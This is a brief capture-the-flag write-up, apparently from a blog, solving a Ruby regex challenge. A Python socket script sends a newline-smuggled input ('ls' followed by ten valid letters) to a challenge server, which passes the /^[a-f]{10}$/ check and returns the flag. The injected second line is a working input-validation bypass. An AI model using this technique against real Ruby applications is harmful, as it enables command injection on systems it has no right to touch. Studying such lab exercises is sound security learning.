When I access the server ;188.166.133.53:12037.
It shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", Then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"
The Ruby has a vulnerability of regex. I code to get a Flag.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))
print s.recv(1024)
print s.recv(1024)
s.send('ls\naaaaaaaaaa')
print s.recv(1024)
s.close()
Then, the server returns as below:
$ python test.py
Let me count the ascii values of 10 characters:
Sum is: 1203
IW{RUBY_R3G3X_F41L}
FLAG:
IW{RUBY_R3G3X_F41L}
Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
No comments:
Post a Comment